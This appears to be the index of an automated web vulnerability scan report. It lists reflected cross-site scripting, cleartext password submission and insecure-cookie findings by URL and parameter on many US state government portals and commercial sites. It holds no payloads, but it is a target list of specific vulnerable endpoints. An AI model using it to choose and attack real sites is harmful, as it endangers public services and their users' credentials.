1.1. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]
1.5. http://www.alabama.gov/portal/index.jsp [User-Agent HTTP header]
1.8. http://www.vsea.org/join-your-union [name of an arbitrarily supplied request parameter]
1.9. http://www.vsea.org/sites/vsea.org/themes/unionproud2/favicon.ico [REST URL parameter 3]
2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]
2.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]
2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]
2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]
2.5. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif [REST URL parameter 1]
3. Cross-site scripting (reflected)
3.1. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]
3.3. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp [hdn_SessionId parameter]
3.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]
3.5. http://badge.dopiaza.org/flickr/badge.php [name of an arbitrarily supplied request parameter]
3.6. http://badge.dopiaza.org/flickr/badge.php [user parameter]
3.7. http://data.gosquared.com/info [a parameter]
3.8. http://data.ok.gov/api/rdfTerms.json [REST URL parameter 2]
3.9. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 2]
3.10. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 3]
3.11. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 4]
3.12. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [size parameter]
3.13. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 2]
3.14. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 3]
3.15. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 4]
3.16. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [size parameter]
3.17. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 2]
3.18. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 3]
3.19. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 4]
3.20. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [size parameter]
3.21. http://data.ok.gov/views.json [REST URL parameter 1]
3.22. http://data.ok.gov/views.json [tableId parameter]
3.23. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 1]
3.24. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 2]
3.25. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 3]
3.26. http://data.ok.gov/views/INLINE/rows.json [accessType parameter]
3.27. http://data.ok.gov/views/INLINE/rows.json [length parameter]
3.28. http://data.ok.gov/views/INLINE/rows.json [start parameter]
3.29. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 1]
3.30. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 2]
3.31. http://data.ok.gov/views/dz4w-xbzm.json [accessType parameter]
3.32. http://data.ok.gov/w/dz4w-xbzm/q69b-3vw6 [REST URL parameter 3]
3.33. http://digg.com/submit [REST URL parameter 1]
3.34. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 1]
3.35. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 2]
3.36. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 1]
3.37. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 2]
3.38. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 1]
3.39. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 2]
3.41. http://image.providesupport.com/cmd/hic [REST URL parameter 1]
3.42. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 1]
3.43. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 2]
3.44. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]
3.45. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]
3.46. http://image.providesupport.com/js/hic/safe-standard.js [online-image parameter]
3.47. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 1]
3.48. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 2]
3.49. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [callback parameter]
3.51. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [startIndex parameter]
3.52. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
3.54. http://landmark-project.com/feed2js/feed2js.php [src parameter]
3.55. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]
3.56. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]
3.57. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]
3.58. http://newbrowse.livehelper.com/servlet/lhBrowse [id parameter]
3.59. http://newchat.livehelper.com/servlet/lhChat [REST URL parameter 2]
3.60. http://newchat.livehelper.com/servlet/lhChat [id parameter]
3.61. http://nv.gov/workarea/csslib/ektronCss.ashx [id parameter]
3.62. http://nv.gov/workarea/java/ektronJs.ashx [id parameter]
3.63. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php [OLTSite parameter]
3.64. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do [REST URL parameter 2]
3.65. https://onestop.michigan.gov/onestop-main/OneStop/css/a [REST URL parameter 4]
3.66. https://onestop.michigan.gov/onestop-main/OneStop/css/none [REST URL parameter 4]
3.67. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do [REST URL parameter 3]
3.68. https://pixel.fetchback.com/serve/fb/pdc [name parameter]
3.69. http://serverapi.arcgisonline.com/jsapi/arcgis/ [v parameter]
3.70. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 1]
3.71. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 2]
3.72. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 3]
3.73. http://sussex.de.schoolwebpages.com/favicon.ico [REST URL parameter 1]
3.74. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 1]
3.75. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 2]
3.84. http://tomcat2.dot.state.ga.us/favicon.ico [REST URL parameter 1]
3.85. http://widgets.digg.com/buttons/count [url parameter]
3.86. http://www.addthis.com/bookmark.php [REST URL parameter 1]
3.87. http://www.addthis.com/bookmark.php [REST URL parameter 1]
3.88. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
3.89. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 1]
3.90. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 2]
3.91. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 3]
3.92. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]
3.93. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]
3.96. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 1]
3.97. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 2]
3.98. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 3]
3.99. http://www.delmar.k12.de.us/favicon.ico [REST URL parameter 1]
3.100. http://www.georgia.gov/external/ [url parameter]
3.101. http://www.georgia.gov/external/ [url parameter]
3.102. http://www.georgia.gov/external/ [url parameter]
3.103. http://www.healthynh.com/index-fhc.php [name of an arbitrarily supplied request parameter]
3.105. http://www.ms.gov/ms_sub_template.jsp [Category_ID parameter]
3.106. http://www.nv.gov/workarea/csslib/ektronCss.ashx [id parameter]
3.107. http://www.nv.gov/workarea/java/ektronJs.ashx [id parameter]
3.108. http://www.nysegov.com/citGuide.cfm [content parameter]
3.109. http://www.nysegov.com/citGuide.cfm [superCat parameter]
3.110. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx [Resource parameter]
3.119. https://www.vermontjoblink.com/ada/leavesite.cfm [url parameter]
3.120. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [rand parameter]
3.121. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [BLTEXTBOXEXTRADONOTUSE1_prev parameter]
3.122. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [CFTEXTBOXEXTRADONOTUSE_prev parameter]
3.123. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [ERRORFIELDS parameter]
3.124. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMID_prev parameter]
3.125. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMNAME_prev parameter]
3.126. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormID parameter]
3.127. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]
3.128. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]
3.129. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [OLD_CHOICE_prev parameter]
3.130. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [RAND_prev parameter]
3.131. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SECURITYSYS_prev parameter]
3.132. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [U_name parameter]
3.133. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]
3.134. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]
3.135. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]
3.136. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]
3.137. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [choice parameter]
3.138. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [errorfields parameter]
3.139. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]
3.140. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]
3.141. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formname parameter]
3.142. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]
3.143. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]
3.144. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]
3.145. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]
3.146. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]
3.147. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]
3.148. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]
3.149. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]
3.150. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]
3.151. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [submit parameter]
3.152. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]
3.153. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid_ADAdefault parameter]
3.154. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [type parameter]
3.155. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [reg%5Ftype parameter]
3.156. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [def parameter]
3.157. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [FormID parameter]
3.158. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [rand parameter]
3.159. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [securitysys parameter]
3.160. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]
3.161. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]
3.164. http://www.visitflorida.com/floridalive [REST URL parameter 1]
3.165. http://www.visitflorida.com/floridalive [name of an arbitrarily supplied request parameter]
3.166. http://www.visitflorida.com/images/webcam.php [REST URL parameter 1]
3.167. http://www.visitflorida.com/images/webcam.php [REST URL parameter 2]
3.168. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 1]
3.169. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 2]
3.170. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 3]
3.171. http://www.workoneworks.com/ [name of an arbitrarily supplied request parameter]
3.172. http://www.workoneworks.com/favicon.ico [name of an arbitrarily supplied request parameter]
3.173. https://secure.missingkids.com/missingkids/servlet/CybertipServlet [Referer HTTP header]
3.174. http://www.addthis.com/bookmark.php [Referer HTTP header]
3.175. http://www.addthis.com/bookmark.php [Referer HTTP header]
3.176. http://www.addthis.com/bookmark.php [Referer HTTP header]
3.177. http://www.nist.gov/cgi-bin/exit_nist.cgi [Referer HTTP header]
3.178. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [Referer HTTP header]
3.179. http://image.providesupport.com/js/hic/safe-standard.js [vsid cookie]
3.180. http://image.providesupport.com/js/hic/safe-textlink.js [vsid cookie]
3.181. http://seg.sharethis.com/getSegment.php [__stid cookie]
3.182. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]
3.183. https://www.nrsservicecenter.com/iApp/ret/content/landing.do [MyNRSSite cookie]
3.184. https://www.nrsservicecenter.com/iApp/ret/landing.do [MyNRSSite cookie]
3.185. https://www.nrsservicecenter.com/iApp/ret/showPage.do [MyNRSSite cookie]
3.186. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]
3.187. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]
3.188. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]
3.189. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]
3.194. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]
3.195. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]
3.196. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]
3.197. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]
3.198. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]
3.199. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]
3.200. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]
3.201. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]
3.202. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]
3.203. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]
3.204. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]
3.205. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]
3.206. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]
3.207. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]
3.208. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]
3.209. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]
3.210. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]
3.211. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]
3.212. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]
3.213. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]
3.214. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]
3.215. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]
3.216. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]
3.217. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]
3.218. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]
3.219. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]
3.220. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]
3.221. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]
3.222. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]
3.223. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]
3.224. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]
3.225. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]
3.226. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]
3.227. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]
3.228. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]
3.229. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]
3.230. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]
3.231. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]
3.232. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]
3.233. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]
3.234. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]
3.235. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]
3.236. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]
3.237. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]
3.238. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]
3.239. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]
3.240. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]
3.241. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]
3.242. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]
3.243. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]
3.244. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]
3.245. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]
3.246. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]
3.247. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]
3.248. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]
3.249. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]
3.250. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]
5. Cleartext submission of password
5.4. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php
5.5. http://pa.gov/portal/server.pt
5.6. http://www.alabama.gov/portal/index.jsp
5.7. http://www.visitflorida.com/floridalive
5.9. http://www.vsea.org/editorial-lays-out-vermont%26%23039
5.10. http://www.vsea.org/favicon.ico
5.11. http://www.vsea.org/join-vsea
5.12. http://www.vsea.org/join-your-union
5.13. http://www.vsea.org/maine-study-finds-state%26%23039
5.14. http://www.vsea.org/node
5.15. http://www.vsea.org/purchase-vsea-clothing
5.16. http://www.vsea.org/state-hospital%26%23039
6.1. http://us.mcafee.com/root/basket.asp [Currency cookie]
6.2. http://us.mcafee.com/root/basket.asp [SiteID cookie]
6.3. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]
7. SSL cookie without secure flag set
7.1. https://apps.tn.gov/bizreg/bizregprog
7.2. https://apps.tn.gov/bizreg/tax.jsp
7.3. https://apps.tn.gov/biztax-app/login.html
7.4. https://apps.tn.gov/paams-app/index.htm
7.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm
7.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm
7.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp
7.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp
7.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
7.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp
7.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp
7.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp
7.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp
7.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp
7.15. https://dhr.ky.gov/DHRWeb/RS
7.16. https://dotax.ehawaii.gov/efile/user
7.17. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp
7.18. https://fin.oaks.ohio.gov/psp/FNPRD/
7.19. https://fortress.wa.gov/dol/dolprod/dsdoffices/
7.20. https://georgiawildlife.dnr.state.ga.us/service/login1.asp
7.21. https://hcm.oaks.ohio.gov/psp/HCPRD/
7.22. https://home.mcafee.com/ScriptResource.axd
7.23. https://home.mcafee.com/Secure/Protected/Login.aspx
7.24. https://home.mcafee.com/WebResource.axd
7.25. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js
7.26. https://home.mcafee.com/secure/cart
7.27. https://home.mcafee.com/secure/cart/
7.28. https://home.mcafee.com/secure/purchase/
7.29. https://iris.custhelp.com/
7.31. https://iris.custhelp.com/app/home
7.32. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm
7.33. https://license.ohio.gov/lookup/default.asp
7.34. https://louisianadcpretire.gwrs.com/login.do
7.35. https://moversguide.usps.com/icoa/flow.do
7.36. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx
7.37. https://njmvcscheduling.state.nj.us/tc/driverlogin.do
7.38. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do
7.39. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do
7.40. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/
7.41. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/
7.42. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/
7.43. https://portal.s4web.state.mn.us/psp/por91ssap_newwin/SELFSERVICE/ENTP/e/
7.44. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
7.45. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm
7.46. https://secure.kentucky.gov/portal/login.aspx
7.47. https://secure.sces.org/PDIC/GatewayServlet
7.48. https://services.georgia.gov/dhr/cspp/do/public/Welcome
7.49. https://ssl.sc.gov/osmbareportfiling/precerttool.aspx
7.50. https://txapps.texas.gov/tolapp/txdl/welcome.dl
7.51. https://txapps.texas.gov/tolapp/viewandpay
7.52. https://unitedalert.com/
7.53. https://web.globalpay.com/taxpayer/default.asp
7.54. https://www.accesskansas.org/businesscenter/index.html
7.55. https://www.alabamainteractive.org/abc_license/
7.56. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf
7.57. https://www.humanservices.state.pa.us/Compass.Web/
7.58. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp
7.59. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal
7.60. https://www.ncourt.com/forms/DE/navigation.aspx
7.61. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin
7.62. https://www.nrsservicecenter.com/iApp/ret/content/landing.do
7.63. https://www.nrsservicecenter.com/iApp/ret/landing.do
7.64. https://www.nrsservicecenter.com/iApp/ret/showPage.do
7.65. https://www.scsignon.sc.gov/
7.66. https://www.tennesseeanytime.org/paams-app/index.htm
7.67. https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp
7.68. https://www.vermontjoblink.com/ada/
7.69. https://www.vermontjoblink.com/ada/404/404_qry.cfm
7.70. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm
7.71. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm
7.72. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico
7.73. https://www.vermontjoblink.com/ada/default.cfm
7.74. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm
7.75. https://www.vermontjoblink.com/ada/leavesite.cfm
7.76. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm
7.77. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
7.78. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm
7.79. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm
7.80. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm
7.81. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm
7.82. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm
7.83. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm
7.84. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm
7.85. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm
7.86. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm
7.87. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm
7.88. https://www.vermontjoblink.com/ada/works/FAQ.cfm
7.89. https://www.vermontjoblink.com/ada/works/Login.cfm
7.90. https://www.vermontjoblink.com/ada/works/contactus.cfm
7.91. https://www.vermontjoblink.com/ada/works/employeroverview.cfm
7.92. https://www.vermontjoblink.com/ada/works/joboverview.cfm
7.93. https://www.vermontjoblink.com/ada/works/jobsearch.cfm
7.94. https://www.vermontjoblink.com/ada/works/linkview.cfm
7.95. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm
7.96. https://www.vermontjoblink.com/favicon.ico
7.97. https://adwords.google.com/um/StartNewLogin
7.98. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php
7.99. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS
7.100. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf
7.101. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css
7.102. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css
7.103. https://assist.dhss.delaware.gov/favicon.ico
7.104. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg
7.105. https://assist.dhss.delaware.gov/images/Assist_header_text.gif
7.106. https://assist.dhss.delaware.gov/images/Assist_logo.gif
7.107. https://assist.dhss.delaware.gov/images/arrow_center.gif
7.108. https://assist.dhss.delaware.gov/images/arrow_left.gif
7.109. https://assist.dhss.delaware.gov/images/arrow_right.gif
7.110. https://assist.dhss.delaware.gov/images/corner_brown_color.gif
7.111. https://assist.dhss.delaware.gov/images/corner_teal_color.gif
7.112. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif
7.113. https://assist.dhss.delaware.gov/images/shim.gif
7.114. https://favorites.live.com/quickadd.aspx
7.115. https://fortress.wa.gov/dol/dolprod/vehoffices/
7.116. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css
7.117. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css
7.118. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css
7.119. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css
7.121. https://iris.custhelp.com/rnt/rnw/css/enduser.css
7.122. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif
7.123. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js
7.124. https://iris.va.gov/favicon.ico
7.125. https://maps-api-ssl.google.com/maps
7.126. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php
7.127. https://pixel.fetchback.com/serve/fb/pdc
7.128. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe
7.129. https://www.accesskansas.org/dissolutions/
7.130. https://www.accesskansas.org/images/footer_images/current_year.gif
7.131. https://www.accesskansas.org/images/footer_images/from2002.gif
7.132. https://www.accesskansas.org/kbc/img/icons/external.png
7.133. https://www.alabamainteractive.org/favicon.ico
7.134. https://www.bbb.org/online/consumer/cks.aspx
7.135. https://www.colorado.gov/apps/feedback/servlet/begin
7.136. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx
7.137. https://www.mcafeesecure.com/RatingVerify
7.138. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css
7.139. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css
7.140. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css
7.142. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif
7.143. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg
